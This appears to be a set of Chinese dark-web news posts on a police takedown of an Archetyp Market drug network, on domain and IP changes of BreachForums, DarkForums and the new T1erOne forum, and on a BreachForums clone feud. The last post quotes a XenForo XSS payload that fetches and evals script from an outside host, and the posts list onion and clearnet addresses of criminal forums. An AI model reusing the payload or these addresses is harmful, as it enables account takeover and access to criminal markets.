分析的数据显示,贩毒和洗钱活动并非由单一犯罪团伙所为,而是一个由多个犯罪团伙通过错综复杂的公司网络相互连接而成的犯罪网络。该网络在泰国的成员运营着一个针对北欧客户的大规模线上毒品分销网络。在瑞典,成员们负责管理国内毒品分销并洗钱。在西班牙,一名高价值目标人物正在协助进行大规模毒品贩运。而该犯罪网络的其他部分则与泰国、德国和澳大利亚有关联。
在对手机进行分析后,全球执法部门迫切需要携手合作,共同打击这一犯罪活动。欧洲司法组织促成了五个国家的司法部门会面、信息共享和战略行动计划的制定。在欧洲司法组织和欧洲刑警组织的协调下,这种高效的国际合作促成了对该犯罪网络的首次打击。德国当局查获了一批重达1.2吨、目的地为澳大利亚市场的合成毒品。随后,两名正在等待这批货物抵达的分销商在澳大利亚被确认身份并逮捕。
在确定了该网络中的关键角色后,当局制定了一项有针对性的全球行动。2026年3月4日起,在西班牙、瑞典和泰国执行了约20次搜查行动,逮捕了15名犯罪嫌疑人,并查获了价值约300万至400万欧元的资产。警方缴获了包括手机和文件在内的重要证据,这些证据将被进一步取证分析。
泰国警方配合抓获3名瑞典男子 瑞典和澳大利亚当局在情报显示嫌疑人与暗网平台有关联后,请求泰国协助。调查人员认为,这些人选择泰国是为了寻求隐私和舒适的生活方式,同时避开欧洲警方的视线,操控犯罪活动。
据泰国中央调查局(Central Investigation Bureau)称,此次逮捕行动代号为“潘多拉行动”(Operation Pandora),“潘多拉行动”的目标是那些试图通过在泰国居住来逃避本国指控的外国逃犯。
2026年3月7日,泰国警方突袭了曼谷和巴蜀府的九处地点。警方重点搜查了高档泳池别墅及其附近住宅,调查人员认为这些地点与嫌疑人的日常犯罪活动有关。
调查人员称,该团伙与一个在暗网经营毒品市场的跨国犯罪集团有关,他们利用在泰国的房产作为远程基地,协助管理与Archetyp Market和Mupparna.net相关的网站。
被捕的3名嫌疑人分别为47岁的罗伯特·米凯尔·林德(Robert Mikael Lind,在曼谷旺通朗区拉抛巷 87 号被拘留,主要原因是与签证逾期滞留有关的移民指控)、39岁的丹尼尔·李(Daniel Lee,在巴蜀府华欣地区塔泰的一处房产内被捕)和33岁的约翰·阿亚·加瓦姆扎德(John Arya Ghavamzadeh,在华欣地区被拘留)。
2026年3月8日,泰国中央调查局(CIB)局长纳塔萨克·乔瓦纳赛中将宣布了逮捕行动。他还强调,案件之所以能够取得进展,是因为各机构之间进行了跨境信息共享。
调查人员称,嫌疑人协助运营了Archetyp Market(一个长期运营的暗网市场,主要交易毒品。欧洲执法机构此前曾针对该平台采取行动,导致多名涉案人员被捕及相关物品被查扣)和Mupparna.net(与上述平台同属一个网络,同样支持匿名毒品交易)两个网站,这两个网站都与暗网上的毒品销售有关。当局声称,该网络控制了欧洲某些类型非法网络毒品交易市场 80% 以上的份额。
警方称,这些交易平台允许买卖双方使用加密货币进行匿名交易。在后台,版主和管理员负责审核卖家信息、处理纠纷和进行基本的监管。嫌疑人利用加密信息和专用设备,在泰国远程操控这些网站。在这种模式下,豪华别墅被用作临时控制中心,配备高速互联网和安全设备。
调查人员表示,租用带泳池的别墅符合高级别网络犯罪的常见作案模式。泰国的签证政策、低调的外国人聚居区以及高端租赁房产,都使得嫌疑人更容易融入当地环境,从而在网上作案。
欧洲司法组织和欧洲刑警组织协调的国际执法行动 2025年初,瑞典检察机关意识到需要开展国际协调,由此开启了通过欧洲司法组织开展的司法合作。瑞典、德国、西班牙和澳大利亚当局在海牙欧洲司法组织举行的两次会议至关重要,会议旨在交流信息并制定打击犯罪网络的战略计划。为筹备行动日,欧洲司法组织确保准备了多份欧洲调查令、欧洲逮捕令和冻结令,并分发至多个国家。行动日当天,欧洲司法组织为各国当局提供支持,协助其对行动计划进行紧急调整,并跟进法律请求的执行情况。
欧洲刑警组织提供了全面而长期的支持,这对此次行动的成功至关重要。这包括先进的分析合作和行动协调、加密货币分析等领域的专业知识、定制情报产品和报告的开发,以及用于开展复杂跨境调查行动的专项资金。通过整合这些能力,欧洲刑警组织确保了能够将地方线索转化为针对最高级别有组织犯罪的协调一致的国际行动。
随着犯罪网络日益国际化,组织结构也变得不那么僵化和等级分明,调查和起诉这些网络成员的工作也变得愈发复杂。因此,在全球范围内开展快速高效的司法合作是打击严重有组织犯罪的关键。瑞典高级检察官托芙·库尔贝里(Tove Kullberg)领导了此次调查,她就国际行动评论道:“欧洲司法组织在行动日提供的支持使一切进展顺利。我认为欧洲司法组织的支持至关重要。”
“暗网下/AWX”总结发现,最新的国际执法行动包括在西班牙、瑞典和泰国开展的搜查行动,以及此前在澳大利亚采取的行动。主要成果包括:
全球范围内共有15人被捕,其中西班牙抓获4人,瑞典抓获6人,泰国抓获3人,澳大利亚抓获2人。 泰国警方查获的资产价值超过1亿泰铢(约合300万美元),包括现金、贵重物品,泰国警方还查扣了119件电子产品,包括41部手机、10台平板电脑、11台笔记本电脑、31个数字存储设备、7台路由器。
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
“暗网下/AWX”前期报道,臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封,RAMP曾是允许讨论勒索软件的暗网论坛,受到勒索软件团伙的欢迎。最新情报显示,RAMP的替代品已经出现,新暗网论坛的名称为“T1erOne”(也被称为TierOne、t1eron3、Tier1),可以同时通过暗网和明网进行访问。
近日,有安全研究人员club1337(@club31337)发布推文表示“Ramp已死,TierOne万岁”,并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验,确认T1erOne网站的暗网与明网域名均可以访问:
T1erOne的暗网域名:jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion
T1erOne的明网域名:t1eron3[.]vip
Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M
— club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛,发现该网站主要提供了登录和注册功能。打开该网站,显示了一个简洁的登录界面,包括用户名、密码输入框,以及注册链接,没有复杂的交互或可见的外部资源加载。可以明确的是,与常规暗网论坛不同,新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建,可能系背后的管理员独立开发。
初步分析,T1erOne论坛采用了前后端分离的网站架构,还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务,这可能为执法部门找到其背后的真实服务器IP提供便利。
T1erOne论坛注册不需要邮箱验证,但注册该网站以后,需要管理员进行认证,访问所有页面均跳转提示:
Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу
(本论坛为私密论坛。如需访问,您必须发送您的其他论坛账号(Rehab、XSS、Exploit)或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。)
本站(anwangxia.com)经过对页面的解析,发现了其后端的部分API接口如下:
/api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联,并正在通过新的T1erOne论坛监控该组织,这表明网络犯罪分子的攻击行为不回停歇,勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .